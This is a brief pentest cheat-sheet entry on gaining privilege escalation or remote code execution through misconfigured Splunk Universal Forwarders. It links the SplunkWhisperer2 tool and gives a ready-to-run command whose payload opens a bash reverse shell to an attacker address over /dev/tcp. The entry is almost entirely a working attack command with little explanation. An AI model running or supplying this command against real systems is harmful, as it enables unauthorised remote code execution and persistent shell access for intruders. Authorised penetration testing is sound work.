######
Splunk
######

*********
UF Deploy
*********

| Local privilege escalation, or remote code execution, through Splunk Universal Forwarder (UF) misconfigurations
| https://github.com/cnotin/SplunkWhisperer2


.. code-block:: bash

  python2 /tmp/SplunkWhisperer2/PySplunkWhisperer2/PySplunkWhisperer2_remote.py --lhost "4.3.2.1" --username "user" --password "password" --host "1.2.3.4" --port 8089 --payload "bash -c 'bash -i >& /dev/tcp/4.3.2.1/4444 0>&1'" --payload-file "rs.sh"



